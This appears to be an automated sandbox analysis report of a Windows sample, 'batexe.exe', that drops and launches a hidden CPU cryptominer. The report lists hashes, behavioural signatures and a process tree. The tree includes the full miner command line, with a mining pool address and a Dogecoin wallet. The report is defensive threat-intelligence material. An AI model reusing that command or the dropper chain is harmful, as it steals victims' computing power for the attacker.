Analysis
-
max time kernel
298s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
13/02/2024, 12:34
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231220-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1004 b2e.exe 4300 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4300 cpuminer-sse2.exe 4300 cpuminer-sse2.exe 4300 cpuminer-sse2.exe 4300 cpuminer-sse2.exe 4300 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4976-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4976 wrote to memory of 1004 4976 batexe.exe 84 PID 4976 wrote to memory of 1004 4976 batexe.exe 84 PID 4976 wrote to memory of 1004 4976 batexe.exe 84 PID 1004 wrote to memory of 1664 1004 b2e.exe 85 PID 1004 wrote to memory of 1664 1004 b2e.exe 85 PID 1004 wrote to memory of 1664 1004 b2e.exe 85 PID 1664 wrote to memory of 4300 1664 cmd.exe 88 PID 1664 wrote to memory of 4300 1664 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\88D7.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\88D7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\88D7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91FF.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4300
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21.6MB
MD5ecf543e64081eb478383945fc7fbe3c8
SHA1a1022b8a7416be15e72b9feebeb20b1db9c15765
SHA256ed823461e9cc74e537e704ee5eafe8484d3eda7666880432c0e3abfd1924ca0b
SHA5120b39c23c60cb9b0c44b40f55ee0af7e833823f989df336b594768b2277842b2f654f3ca2eeb9e8d9beaf58750dc3bcf6c1b480e2ead8a27eda7b460bd2809dda
-
Filesize
704KB
MD52bb8bf63c7d7958f71f9307c8635131f
SHA12362f18b011bd1e60fa078052821edefa33b8e08
SHA25685151a35fd2a7ef587918c4702b2adbe0c3e7eed43bc8564a662ed03a6f3ce79
SHA51259eba9edea2b2af76f261db76b15912b20070d75db7cf498d55a1bc13f11692d016c9a70ed447a784c874f6d11582112312f3d058443606eb4b6de349a4857ec
-
Filesize
1.8MB
MD5848468a51c1628796942b744cef34b86
SHA1ba50f25fcd928435dcea5e04723e0948ea2b90db
SHA2567868f8cc974f3247699066d4a13dc4f75420f09a68cccba410b50c3e9808db1d
SHA512f430668f42269baaab31ecc160077cae6fa84551baa71a614f547e736848b731a82c33789c910b0fa32ca3d66e1bf610383e57260ff664c05ba141b7dc716ab4
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
256KB
MD5e0c023f2dc80d8f2415830dcaf9b9e45
SHA19806d1f4bd0f76e044071f95f9210b09c2c09fd0
SHA256dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0
SHA51276d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef
-
Filesize
209KB
MD575ac8e19a5989e286690e3e344a2f30e
SHA1243c9dde4c3ea9cdb56e90ad4215c9480fea5dd7
SHA256ce5fa0865ed790366a068077bc46c1bf0e4f011421c6e249c8a12adf350c72e6
SHA512f39ae2435462ea3582ba1237bc1f5d78499241b07cc940bf30bcd34e7cb4b8e72672b3538932977cfe7784dafd06b6f6a7a14cd93bb2896515c5c8d9af071cf6
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
70KB
MD572c4425a81ccf0ff26cbca6c0d11a991
SHA15b22b39c275ebb0c8ee55b70daf8d3534b7e6a7e
SHA256b440d1d23536d9a618b43c6ccc5ec428b412ccdd48ee83b30efd656a45fb9779
SHA512a1b9554d17b112aaee2533f42949c6861ec919545692d555534aa3841733ca168b7dc28f34b593361c6c7956d8017db387d88795d0f5cc10e571b7b7536dd742
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
42KB
MD55336e65b1909dcaf75b82677e9e17d68
SHA18f3c3b512ab1825626dd8695030855274d524717
SHA2569913ae3652d6837ec4851a249858cd9fa472adcd773ca17e407b6813be6f11e2
SHA5126905bb8d96402ef1c9ff383436e5c7c3e148919e55a50de01f7ae115990993b1e45ab9d5ff08f54484dcfd483c1c4bca6b50a89a5844e47afb803145fc93c05e
-
Filesize
132KB
MD5dc7614d02a3fd7f54978d5148974a207
SHA17593a2b556aea984e587ab7f6140ded52d592958
SHA256a975c93df43ca645abafd4e4b80c36a24e852a577e61110ec8a330af4c22dcca
SHA512b455db6f0fce7368df05ea3aa6cb9f018f205f6ac7dfaa14a11a786829c83abba2c0887a237f687f64f7bdadafebe674fad233bd0cacdd163e412db5c62cacba
-
Filesize
57KB
MD54a91d8f522a86a4a67e44a7667410a6f
SHA17ecf2598d4da2b1b105991b2f5a49c8e14e648a4
SHA2564ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c
SHA512aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3
-
Filesize
21KB
MD5bbc2316e7b65a6a8f61f444fb781e5fa
SHA19f9c4294e33d466a63a396a87019c5092d8021fb
SHA256ec855a23caf39a30ac93a11fb1cd4dfa2db96149670daa3e2af73041e60269a7
SHA5125bdc8abb18205f02377004622d89ce61da7047a4bc00fe21ae9bcabc1d77ec9761996cc84efd771855ce17df5026a18cb6e7c18cacf4c8533d5f9a98c0ccb4c3
-
Filesize
55KB
MD506b7e23a5d87f427ac527b5db8d68f5c
SHA1e3242ccbf74042cfd2ad821b812ec3ca912cae1b
SHA25683d52ae43d56e8540396848cd18375416683e664a00a2d7e3bdbde1aa5067dd1
SHA512b7de61f45bb248f866b9f48758f0678f977c1d9dde3a4bd52eeacddccf4f3e43c2e429f54be29f4e1e0253d5c587865a782750d81519ef95057e1cd3e6fc3269
-
Filesize
81KB
MD532356c4a73b92a790d8409b7d40b1827
SHA148cac1cb62afb2c1856506ccdb3e3336ddff5943
SHA256b6921bce876ebb870bd8a7b4d9b900dbe140ee6666bdfce6f7758f801390cba6
SHA5126d0abc610c10c5e6f202a182a5550f84f61dbb207b27e84a2cac5ce1038ed391f671c2dd21e019ca1b8023f2c0af1db4e38d32febcd53353f6af9ac412d6f649